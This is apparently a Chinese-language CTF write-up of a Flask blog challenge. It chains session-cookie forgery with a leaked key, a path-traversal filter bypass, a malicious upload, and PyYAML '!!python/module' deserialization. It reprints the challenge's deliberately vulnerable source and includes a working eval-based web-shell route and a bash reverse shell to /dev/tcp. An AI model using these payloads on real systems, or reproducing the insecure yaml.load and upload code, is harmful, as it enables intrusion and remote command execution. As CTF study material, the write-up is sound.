首先得感谢lengf师傅给解答一些很傻的问题

这个题后面涉及到的知识点之前还没学过,先看看吧
进入题目注册一个账号发现admin已经被注册,这里就要想到session伪造,以admin登录
要伪造session就得知道key,在Blog路由的flask 基础总结这篇文章找到key
zzBSnx.png
然后用工具伪造
python flask_session_cookie_manager3.py encode -s 7his_1s_my_fav0rite_ke7 -t "{'_permanent':True,'username':'admin'}"
以admin登录会发现多了一个Download路由
zzBpB6.png
点进入是一张图片,抓包,存在目录穿越,这里是用.//./绕过,源码过滤方式为.replace('..', '').replace('//', '')
zzB9HK.png
源码在app/app.py
zzBiND.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
//app.py
from flask import *
import config

app = Flask(__name__)
app.config.from_object(config)
app.secret_key = '7his_1s_my_fav0rite_ke7'
from model import *
from view import *

app.register_blueprint(index, name='index')
app.register_blueprint(blog, name='blog')


@app.context_processor
def login_statue():
username = session.get('username')
if username:
try:
user = User.query.filter(User.username == username).first()
if user:
return {"username": username, 'name': user.name, 'password': user.password}
except Exception as e:
return e
return {}


@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404


@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500


if __name__ == '__main__':
app.run('0.0.0.0', 80)

通过导入模块判断是MVT架构,搜索一波

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
python3 manage.py startapp myweb

这将创建一个目录myweb,其目录如下:此目录结构将容纳轮询应用程序。

[root@localhost demo]# tree mysite/
mysite/
├── manage.py
├── mysite
│ ├── __init__.py
│ ├── settings.py
│ ├── urls.py
│ └── wsgi.py
└── myweb
├── admin.py
├── apps.py
├── __init__.py
├── migrations
│ └── __init__.py
├── models.py
├── tests.py
└── views.py

可以看到其结构,然后读取view/__init__.py发现在其中又导入了其他模块
zzBPAO.png
接着读取index.py和blog.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
//index.py
from flask import Blueprint, session, render_template, request, flash, redirect, url_for, Response, send_file
from werkzeug.security import check_password_hash
from decorators import login_limit, admin_limit
from model import *
import os

index = Blueprint("index", __name__)


@index.route('/')
def hello():
return render_template('index.html')


@index.route('/register', methods=['POST', 'GET'])
def register():
if request.method == 'GET':
return render_template('register.html')
if request.method == 'POST':
name = request.form.get('name')
username = request.form.get('username')
password = request.form.get('password')
user = User.query.filter(User.username == username).first()
if user is not None:
flash("该用户名已存在")
return render_template('register.html')
else:
user = User(username=username, name=name)
user.password_hash(password)
db.session.add(user)
db.session.commit()
flash("注册成功!")
return render_template('register.html')


@index.route('/login', methods=['POST', 'GET'])
def login():
if request.method == 'GET':
return render_template('login.html')
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
user = User.query.filter(User.username == username).first()
if (user is not None) and (check_password_hash(user.password, password)):
session['username'] = user.username
session.permanent = True
return redirect(url_for('index.hello'))
else:
flash("账号或密码错误")
return render_template('login.html')


@index.route("/updatePwd", methods=['POST', 'GET'])
@login_limit
def update():
if request.method == "GET":
return render_template("updatePwd.html")
if request.method == 'POST':
lodPwd = request.form.get("lodPwd")
newPwd1 = request.form.get("newPwd1")
newPwd2 = request.form.get("newPwd2")
username = session.get("username")
user = User.query.filter(User.username == username).first()
if check_password_hash(user.password, lodPwd):
if newPwd1 != newPwd2:
flash("两次新密码不一致!")
return render_template("updatePwd.html")
else:
user.password_hash(newPwd2)
db.session.commit()
flash("修改成功!")
return render_template("updatePwd.html")
else:
flash("原密码错误!")
return render_template("updatePwd.html")


@index.route('/download', methods=['GET'])
@admin_limit
def download():
if request.args.get('path'):
path = request.args.get('path').replace('..', '').replace('//', '')
path = os.path.join('static/upload/', path)
if os.path.exists(path):
return send_file(path)
else:
return render_template('404.html', file=path)
return render_template('sayings.html',
yaml='所谓『恶』,是那些只为了自己,利用和践踏弱者的家伙!但是,我虽然是这样,也知道什么是令人作呕的『恶』,所以,由我来制裁!')


@index.route('/logout')
def logout():
session.clear()
return redirect(url_for('index.hello'))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
//blog.py
import os
import random
import re
import time

import yaml
from flask import Blueprint, render_template, request, session
from yaml import Loader

from decorators import login_limit, admin_limit
from model import *

blog = Blueprint("blog", __name__, url_prefix="/blog")


def waf(data):
if re.search(r'apply|process|eval|os|tuple|popen|frozenset|bytes|type|staticmethod|\(|\)', str(data), re.M | re.I):
return False
else:
return True


@blog.route('/writeBlog', methods=['POST', 'GET'])
@login_limit
def writeblog():
if request.method == 'GET':
return render_template('writeBlog.html')
if request.method == 'POST':
title = request.form.get("title")
text = request.form.get("text")
username = session.get('username')
create_time = time.strftime("%Y-%m-%d %H:%M:%S")
user = User.query.filter(User.username == username).first()
blog = Blog(title=title, text=text, create_time=create_time, user_id=user.id)
db.session.add(blog)
db.session.commit()
blog = Blog.query.filter(Blog.create_time == create_time).first()
return render_template('blogSuccess.html', title=title, id=blog.id)


@blog.route('/imgUpload', methods=['POST'])
@login_limit
def imgUpload():
try:
file = request.files.get('editormd-image-file')
fileName = file.filename.replace('..','')
filePath = os.path.join("static/upload/", fileName)
file.save(filePath)
return {
'success': 1,
'message': '上传成功!',
'url': "/" + filePath
}
except Exception as e:
return {
'success': 0,
'message': '上传失败'
}


@blog.route('/showBlog/<id>')
def showBlog(id):
blog = Blog.query.filter(Blog.id == id).first()
comment = Comment.query.filter(Comment.blog_id == blog.id)
return render_template("showBlog.html", blog=blog, comment=comment)


@blog.route("/blogAll")
def blogAll():
blogList = Blog.query.order_by(Blog.create_time.desc()).all()
return render_template('blogAll.html', blogList=blogList)


@blog.route("/update/<id>", methods=['POST', 'GET'])
@login_limit
def update(id):
if request.method == 'GET':
blog = Blog.query.filter(Blog.id == id).first()
return render_template('updateBlog.html', blog=blog)
if request.method == 'POST':
id = request.form.get("id")
title = request.form.get("title")
text = request.form.get("text")
blog = Blog.query.filter(Blog.id == id).first()
blog.title = title
blog.text = text
db.session.commit()
return render_template('blogSuccess.html', title=title, id=id)


@blog.route("/delete/<id>")
@login_limit
def delete(id):
blog = Blog.query.filter(Blog.id == id).first()
db.session.delete(blog)
db.session.commit()
return {
'state': True,
'msg': "删除成功!"
}


@blog.route("/myBlog")
@login_limit
def myBlog():
username = session.get('username')
user = User.query.filter(User.username == username).first()
blogList = Blog.query.filter(Blog.user_id == user.id).order_by(Blog.create_time.desc()).all()
return render_template("myBlog.html", blogList=blogList)


@blog.route("/comment", methods=['POST'])
@login_limit
def comment():
text = request.values.get('text')
blogId = request.values.get('blogId')
username = session.get('username')
create_time = time.strftime("%Y-%m-%d %H:%M:%S")
user = User.query.filter(User.username == username).first()
comment = Comment(text=text, create_time=create_time, blog_id=blogId, user_id=user.id)
db.session.add(comment)
db.session.commit()
return {
'success': True,
'message': '评论成功!',
}


@blog.route('/myComment')
@login_limit
def myComment():
username = session.get('username')
user = User.query.filter(User.username == username).first()
commentList = Comment.query.filter(Comment.user_id == user.id).order_by(Comment.create_time.desc()).all()
return render_template("myComment.html", commentList=commentList)


@blog.route('/deleteCom/<id>')
def deleteCom(id):
com = Comment.query.filter(Comment.id == id).first()
db.session.delete(com)
db.session.commit()
return {
'state': True,
'msg': "删除成功!"
}


@blog.route('/saying', methods=['GET'])
@admin_limit
def Saying():
if request.args.get('path'):
file = request.args.get('path').replace('../', 'hack').replace('..\\', 'hack')
try:
with open(file, 'rb') as f:
f = f.read()
if waf(f):
print(yaml.load(f, Loader=Loader))
return render_template('sayings.html', yaml='鲁迅说:当你看到这句话时,还没有拿到flag,那就赶紧重开环境吧')
else:
return render_template('sayings.html', yaml='鲁迅说:你说得不对')
except Exception as e:
return render_template('sayings.html', yaml='鲁迅说:'+str(e))
else:

with open('view/jojo.yaml', 'r', encoding='utf-8') as f:
sayings = yaml.load(f, Loader=Loader)
saying = random.choice(sayings)
return render_template('sayings.html', yaml=saying)

然后看到blog.py的一个文件上传的路由

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
@blog.route('/imgUpload', methods=['POST'])  
@login_limit
def imgUpload():
try:
file = request.files.get('editormd-image-file')
fileName = file.filename.replace('..','')
filePath = os.path.join("static/upload/", fileName)
file.save(filePath)
return {
'success': 1,
'message': '上传成功!',
'url': "/" + filePath
}
except Exception as e:
return {
'success': 0,
'message': '上传失败'
}

yaml反序列化绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
@blog.route('/saying', methods=['GET'])  
@admin_limit
def Saying():
if request.args.get('path'):
file = request.args.get('path').replace('../', 'hack').replace('..\\', 'hack')
try:
with open(file, 'rb') as f:
f = f.read()
if waf(f):
print(yaml.load(f, Loader=Loader))
return render_template('sayings.html', yaml='鲁迅说:当你看到这句话时,还没有拿到flag,那就赶紧重开环境吧')
else:
return render_template('sayings.html', yaml='鲁迅说:你说得不对')
except Exception as e:
return render_template('sayings.html', yaml='鲁迅说:'+str(e))
else:

with open('view/jojo.yaml', 'r', encoding='utf-8') as f:
sayings = yaml.load(f, Loader=Loader)
saying = random.choice(sayings)
return render_template('sayings.html', yaml=saying)

我第一次做PYyaml反序列化,先学习一下

yaml.dump():将一个Python对象序列化生成为yaml文档。
yaml.load():将一个yaml文档反序列化为一个Python对象。
检测方法
Python代码中是否包含“import yaml”,若包含则进一步排查是否调用yaml.load()且参数是可控的。
防御方法
使用安全函数yaml.safe_load()替代yaml.load()即可解决Pyyaml反序列化漏洞。

然后是利用yaml文件进行命令执行,但是这个题python中的命令执行函数都给ban了,所以不能直接在yaml进行命令执行,但是可以通过yaml来导入其它模块来进行命令执行
本题通过python/module标签来实现,这里有一个点就是上传的文件和执行的文件不在同一目录,通过出题人的wp可知目录层级为/static/upload/上传的文件,当然通过前面的测试也可猜出来,这个时候yaml文件内容就可写成!!python/module:static.upload,从而加载命令执行的模块,这样写你要加载的模块文件名必须命名为__init__.py否则就要在yaml文件中写入你要加载的模块文件名
先把上面关于module标签利用过程解释一下,感觉逻辑有些混乱了,自己没太理解

假如有个yaml_test.py文件为
import os
os.system('mate-calc')
在另一文件simple.py中,依次运行以下load代码
import yaml
yaml.load("!!python/module:yaml_test" ) #exp方法是随意写的,是不存在的,但必须要有,因为这是命名规则,不然会报错,主要是文件名yaml_test要写对 yaml.load(“!!python/object:yaml_test.exp” )
yaml.load("!!python/name:yaml_test.exp" )
这几条命令都能打开计算器,这里我自己没做测试,yaml版本大于5.1就要加个Loader参数否则执行yaml.load就会报错

上面是要求同一目录,不在同一目录就是本题所用方法,稍微改一下yaml文件文件就行,这样就比较好理解为什么构造yaml文件和__init__.py文件了
接下来就是构造__init__.py文件进行命令执行,出题人自己的wp使用的内存马本人还没太了解所以直接用来打一下,就不解释构造了

1
2
3
4
5
from flask import *  
eval(
"app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('shell')).read())",
{'_request_ctx_stack': url_for.__globals__['_request_ctx_stack'], 'app': url_for.__globals__['current_app']})
# 生成一个shell路由,参数为shell

先将__init__.py传入
zz0vcR.png
这里要注意的是图片上传路由在下面这里,抓本地上传的那个包就行,很傻的一个问题自己在这里卡了半天,得感谢一下lengf师傅给我解答这么傻的问题
zz0xj1.png
然后上传yaml文件
zz0X9J.png
最后访问blog/saying?path=static/upload/poc1.yaml生成路由,进行命令执行
zz0Lh4.png
第二个是反弹shell,我这里用的bash反弹

1
2
import os
os.system('bash -c "bash -i >& /dev/tcp/xxx/2333 0>&1"')

放入__init__.py生成路由时会执行,即可反弹成功
zz0j39.png
有时间再沉淀一下,理解的不是很透彻
参考:
出题人
https://www.tr0y.wang/2022/06/06/SecMap-unserialize-pyyaml/#pythonmodule
https://www.cnblogs.com/damoxilai/p/16707055.html